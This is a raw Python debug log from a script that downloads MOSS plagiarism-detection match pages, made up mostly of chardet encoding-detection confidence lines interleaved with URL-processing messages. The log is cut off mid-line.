40586\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40587\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5488203275033811\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.54740026263768\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40586\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5472879106751923\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5295826015733577\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match194-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match194-1.html\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5588585707638614\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match195-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match195-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match195-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match196-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match196-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match196-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21289\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24642\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21276\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21289\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21276\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21276\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21277\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5487180627356553\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24642\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match202-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match202-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match202-1.html\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21276\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24643\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24642\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5356196010713635\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5321814954628881\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match199-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match198-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match199-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match199-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match198-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match198-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 18757\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25402\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21289\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 17072\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 18744\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 25389\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21276\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24642\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 17059\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 18757\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25402\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21289\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 17072\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 18744\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 25389\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21276\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 17059\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 18744\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 25389\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21276\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 17059\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 18745\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 25390\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21277\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 17060\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 18744\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24643\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 25389\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21276\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 17059\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24642\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5356196010713635\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5664917551286348\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5288963296944127\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5429030804649554\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 